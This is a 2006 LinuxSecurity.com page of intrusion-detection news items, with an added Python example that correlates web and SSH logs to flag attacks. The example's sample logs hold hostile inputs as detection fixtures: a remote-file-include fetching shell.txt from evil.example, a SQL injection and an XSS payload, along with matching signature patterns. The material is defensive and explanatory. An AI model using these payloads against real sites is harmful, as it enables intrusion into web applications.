LinuxSecurity.com
Intrusion Detection
Log analysis for Intrusion detection document.  23 May 2006 
Source: OSSEC - Posted by Benjamin D. Thomas   
A new document, titled "Log analysis for Intrusion Detection", is available. It shows how some threats can be detected by correlating specific patterns in web logs, proxy logs and authentication logs.

"Log analysis is one of the most overlooked aspects of intrusion detection. Nowadays we see every desktop with an anti-virus, companies with multiple firewalls and even simple end-users buying the latest security related tools. However, who is watching or monitoring all the information these tools generate? Or even worse, who is watching your web server, mail server or authentication logs?"

Targeted attack: experience from the trenches  19 May 2006 
Source: Sans.org - Posted by Benjamin D. Thomas   
Learning lessons from incidents is a very important part of incident handling. With targeted attacks this is hard, because you need to have had a case before you can learn from it, so learning from others matters even more. Michael reported on an unnamed organization that was hit by a limited, targeted attack. Detection is usually the hardest part of such attacks; this case appears to have been detected by an alert user who noticed that a domain name in an e-mail was not quite right.

Building a PHP Honeypot  16 May 2006 
Source: InfoSecWriters - Posted by Benjamin D. Thomas   
"From an attacker's viewpoint, a Web application is an interesting target for several reasons. First, the quality of the source code as related to security is often rather poor, as numerous bug reports show... Another factor is the applications' complex setup." [Holz06]

Recent years have seen a substantial rise in the number of attacks directed against web applications, such as SQL injection, cross-site scripting (XSS) and other input validation problems such as remote file includes in some PHP applications, and command injection in the XML-RPC library and in the awstats [Aws06] package. This is partly because a great deal of application-level code has been written, some of it without much regard for security.
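The cross-log correlation that the OSSEC document above describes, together with the web attack classes (remote file include, SQL injection, XSS) listed in the honeypot article, as an added Python example: this is not code from OSSEC, from the honeypot paper or from this site. It parses Apache combined-format access-log lines and OpenSSH syslog lines, flags requests that match a few attack signatures, detects SSH password brute force with a sliding window, and reports when the same source does both. The log lines are constructed samples (RFC 5737 test addresses, hypothetical host `web01`); the signatures, the five-failures-in-five-minutes threshold and the syslog year are illustrative assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# --- Constructed sample data (not real traffic; RFC 5737 test addresses) ---
WEB_LOG = """\
203.0.113.7 - - [10/May/2006:10:14:01 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [10/May/2006:10:14:03 +0000] "GET /login.php?user=admin%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 713 "-" "Mozilla/4.0"
198.51.100.5 - - [10/May/2006:10:15:10 +0000] "GET /about.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2006:10:16:22 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 201 "-" "Mozilla/4.0"
"""

AUTH_LOG = """\
May 10 10:17:01 web01 sshd[2231]: Failed password for invalid user oracle from 203.0.113.7 port 4021 ssh2
May 10 10:17:04 web01 sshd[2233]: Failed password for root from 203.0.113.7 port 4022 ssh2
May 10 10:17:06 web01 sshd[2235]: Failed password for root from 203.0.113.7 port 4023 ssh2
May 10 10:17:09 web01 sshd[2237]: Failed password for root from 203.0.113.7 port 4024 ssh2
May 10 10:17:12 web01 sshd[2239]: Failed password for root from 203.0.113.7 port 4025 ssh2
May 10 10:18:40 web01 sshd[2241]: Accepted password for root from 203.0.113.7 port 4026 ssh2
May 10 10:19:00 web01 sshd[2250]: Accepted publickey for alice from 198.51.100.5 port 50110 ssh2
"""

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "agent"
WEB_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+')
# syslog lines written by OpenSSH's sshd
SSH_FAIL_RE = re.compile(r'^(\w{3} +\d+ [\d:]+) \S+ sshd\[\d+\]: Failed \w+ for (?:invalid user )?(\S+) from (\S+) port')
SSH_OK_RE = re.compile(r'^(\w{3} +\d+ [\d:]+) \S+ sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+) port')

# Signatures run against the URL-decoded request target. Deliberately small:
# the point of the example is correlation, not a complete attack grammar.
WEB_SIGNATURES = {
    "rfi": re.compile(r'[?&][^=&]*=(?:https?|ftp)://', re.I),      # remote file include
    "sqli": re.compile(r"(?:'\s*or\s*'|union\s+select|;\s*drop\s+table)", re.I),
    "xss": re.compile(r'<script', re.I),
    "traversal": re.compile(r'\.\./'),
}

SYSLOG_YEAR = 2006  # assumption: syslog timestamps carry no year, take the web log's


def parse_web(text):
    """Yield (timestamp, ip, tag) for requests matching a web attack signature."""
    for line in text.splitlines():
        m = WEB_RE.match(line)
        if not m:
            continue
        ip, ts, request = m.group(1), m.group(2), m.group(3)
        # drop the "+0000" zone so web and syslog times are both naive and comparable
        when = datetime.strptime(ts.split(" ")[0], "%d/%b/%Y:%H:%M:%S")
        parts = request.split(" ")
        target = unquote(parts[1]) if len(parts) >= 2 else request
        for tag, sig in WEB_SIGNATURES.items():
            if sig.search(target):
                yield when, ip, tag


def parse_auth(text, year=SYSLOG_YEAR):
    """Yield (timestamp, ip, user, accepted) for sshd login attempts."""
    for line in text.splitlines():
        for regex, accepted in ((SSH_FAIL_RE, False), (SSH_OK_RE, True)):
            m = regex.match(line)
            if m:
                when = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
                yield when, m.group(3), m.group(2), accepted
                break


def analyze(web_log=WEB_LOG, auth_log=AUTH_LOG, threshold=5, window=timedelta(minutes=5)):
    """Correlate events per source IP; return {ip: report} for sources worth a look."""
    report = defaultdict(lambda: {"web": [], "ssh_failures": 0, "ssh_accepted": [], "findings": []})
    for when, ip, tag in parse_web(web_log):
        report[ip]["web"].append((when, tag))
    fails = defaultdict(list)
    for when, ip, user, accepted in parse_auth(auth_log):
        if accepted:
            report[ip]["ssh_accepted"].append((when, user))
        else:
            fails[ip].append(when)
            report[ip]["ssh_failures"] += 1

    for ip, r in list(report.items()):
        if r["web"]:
            r["findings"].append("web_attack:" + ",".join(sorted({t for _, t in r["web"]})))
        # brute force: at least `threshold` failures inside one sliding `window`
        times = sorted(fails[ip])
        if any(times[i + threshold - 1] - times[i] <= window for i in range(len(times) - threshold + 1)):
            r["findings"].append("ssh_bruteforce")
            # a login accepted shortly after the burst usually means a guessed password
            if any(times[-1] <= t <= times[-1] + window for t, _ in r["ssh_accepted"]):
                r["findings"].append("ssh_success_after_bruteforce")
        # the same source hitting the web tier and then SSH is one campaign, not two tickets
        if r["web"] and (r["ssh_failures"] or r["ssh_accepted"]):
            r["findings"].append("web_and_ssh_from_same_source")
        if not r["findings"]:
            del report[ip]  # benign login noise such as the publickey login from 198.51.100.5
    return dict(report)


if __name__ == "__main__":
    for ip, r in analyze().items():
        print(ip, r["findings"])
```

Run against the embedded samples, `analyze()` keeps only 203.0.113.7, with the three web signatures, the five-failure burst, the accepted root login 88 seconds later and the cross-log correlation all in its findings; the key-based login from 198.51.100.5 produces nothing. In production the same logic would read from the live files (or be expressed as correlation rules in a tool such as OSSEC), and the signatures would need to be far broader than these four.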

To Executives, Intrusion Defense Is A Hard Sell  27 April 2006 
Source: Search Security - Posted by Eric Lubow   
Network admin Doug Porter has conducted enough budget presentations to know that upper management types tune out when it comes to slides about spyware scanners, content filters and the growing sophistication of online criminals. His chances of getting badly needed intrusion defense resources always improve, however, when he talks to the top brass about inconveniences, like the spam clogging their e-mail queues.

Open Source Intrusion Detection and Prevention: Tools for Today's Corporate Market  27 April 2006 
Source: InfoSecWriters - Posted by Eric Lubow   
There are literally hundreds of reported network attacks each day. Our systems are being compromised by people trying to intrude, disrupt, obtain or destroy our data. The ability to detect intruders and monitor the network systems you operate is not optional. The Sarbanes-Oxley Act is a warning to publicly traded companies that corporate leaders and IT professionals will not be allowed to sit idle while there may be huge gaps in their network defenses. Tools for monitoring and preventing intrusion can be cost-prohibitive for a company that has not budgeted for their implementation or has little exposure to their use. This paper discusses two open source tools, Snort and Bro, that are free or low cost and that you can obtain and learn to use. They are designed to monitor traffic, analyze protocols, capture packets, detect port scans and network mapping, and prevent intrusion. Whether the attack comes from outside your LAN or from inside, do you have the tools and training to meet the demands of securing your network data?

"CSI" for the Enterprise?  27 April 2006 
Posted by Benjamin D. Thomas   
Michael Osborne has been getting a lot of vendor calls lately pitching a new breed of products, typically called electronic data discovery (EDD) tools. These tools promise to investigate historical data to uncover security breaches, compliance failures and plain old errors in transactions across various enterprise systems, from network administration to accounting. Driven by compliance requirements such as Sarbanes-Oxley and the Health Insurance Portability and Accountability Act, these tools focus on user activities, such as who accessed a database or updated a customer account.

Ideal Intrusion Defense Combines Processes And People  25 April 2006 
Source: Search Security - Posted by Eric Lubow   
A global IT service provider with 39,000 employees and thousands of computing devices is sure to be a tempting target for digital desperados. But which attack scenarios are most likely to keep the security chief up at night? Dave Bixler, CISO for Siemens Business Services Inc., a subsidiary of Munich-based Siemens AG, lists three:

# Spyware;
# Stolen or misplaced laptops whose passwords can be unlocked within minutes using any number of online tools; and
# Employees who load sensitive files onto USB keys and then lose them.

Finding software vulnerabilities with "honeyclients"  17 April 2006 
Source: TechWorld.com - Posted by Benjamin D. Thomas   
I've been a big fan of honeypots ever since I first learned about them in Clifford Stoll's The Cuckoo's Egg. His story about catching German hackers because of a 75-cent accounting error is a thrilling forensics journey. Today, I support honeypots because they are a must-have early-warning tool in any organisation. If you can't stop the hacker or malware - it's hard to be perfect all the time - the next best thing is early warning. Placing a honeypot within your enterprise network, next to other valuable assets, assures that any rogue outsiders - or insiders - will be discovered quickly. If the hacker or malware touches the fake asset, it's done. Low cost and low noise equals high value.

Case Of The Lucrative Lure  12 April 2006 
Source: itToolBox - Posted by Benjamin D. Thomas   
"Hand me the boot disk." I said as I motioned to Scrap with my right paw. My left paw was busy making sure that the IDE cables were securely fastened to the suspect's hard drive and the clone drive. "Ah, acquiring a drive in DOS with Encase. This is so old school." Scrap mumbled as he fetched an Encase boot disk from his site bag. The office was very quiet, and only the hum of the suspect's workstation could be heard above our breathing. It was late, much too late, for a couple of monkeys to be playing around in a client's office trying to acquire a hard drive image.

Honeypots - How to seek them out  06 April 2006 
Source: IT Observer - Posted by Benjamin D. Thomas   
Honeypots are used to study attackers' methods and attacks. The idea is to place one or more special servers in a network. An attacker who cannot distinguish genuine servers and services from honeypots will, sooner or later, in his search for a security hole, make use of the services a honeypot offers. All of his activity on the honeypot is logged.

(c)Copyright 2008 Guardian Digital, Inc. All rights reserved.